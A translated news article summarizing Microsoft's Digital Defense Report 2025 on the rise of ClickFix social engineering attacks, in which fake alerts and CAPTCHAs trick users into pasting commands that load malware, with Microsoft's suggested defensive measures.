Microsoft Warns ClickFix Attacks Are Increasing Sharply: Unconscious Users Run Their Own Malware

Revealed a major spike in clickFix-based attacks (photo: x @MsftSecIntel ·)

JAKARTA - Microsoft again warns of the dangers of the latest cyberattacks that are increasing rapidly around the world. In its latest report titled Digital Defense Report 2025, the technology company from Redmond revealed a major spike in clickFix-based attacks, a social engineering tactic that makes users unknowingly infect their own devices with malware.

According to the report, ClickFix is now one of the most common methods hackers use to gain early access to the target system. This technique works in a very cunning way not through system exploitation, but by persuading victims to take actions that seem legitimate but actually dangerous.

ClickFix attacks usually appear in the form of fake pop-ups, technical support messages, or system alerts that seem convincing. The message often asks users to copy and paste certain codes into the 'Run' box in Windows or terminal, citing correcting system errors.

However, once the code is executed, the malware is immediately downloaded and injected into the device's memory, not into the system file. This technique makes it difficult to detect attack traces because it does not leave suspicious files in storage.

Microsoft notes that since early 2024, the number of ClickFix attacks has increased sharply, and has been used in various large-scale fraudulent campaigns. One example is phishing incidents that mimic the Booking.com site in 2024, where victims receive email confirmations of fake travel that directs them to a complete mock site with fake CAPTCHA.

Even more surprising, Microsoft Defender Expands found that 47% of the entire initial access incident last year came from the ClickFix attack. This figure shows how effective this social engineering method is in trapping suspicious users.

What makes ClickFix very dangerous is the fact that users themselves executed the malicious code, without realizing they were opening the door to malware, Microsoft wrote in its report.

Microsoft emphasizes that behavioral education and awareness is the most effective bulwark of this kind of attack. Because of the clickFix nature that relies on user action, there is no single technical solution that can prevent it completely.

Some of the suggested preventive measures include:

Never copy or run a code from an unverified source, even if it looks official.

Enable PowerShell logging to record all activities performed through the terminal.

Monitor the onboard activity to the terminal, in order to detect potential malicious commands copied from outside.

Implement a browser hardening' policy to block the execution of malicious scripts on websites.

Avoid downloading apps from third parties, unless absolutely necessary and officially sourced.

Microsoft insists that in cases like ClickFix, user precautions and vigilance are the only real savers.

With the increasingly sophisticated social manipulation techniques used by hackers, this report is an important reminder for organizations and individuals to be more careful in responding to system messages or warnings that appear on the screen.

"ClickFix shows that modern cyber threats not only depend on technological weaknesses, but also on human weaknesses," Microsoft wrote in its report closing.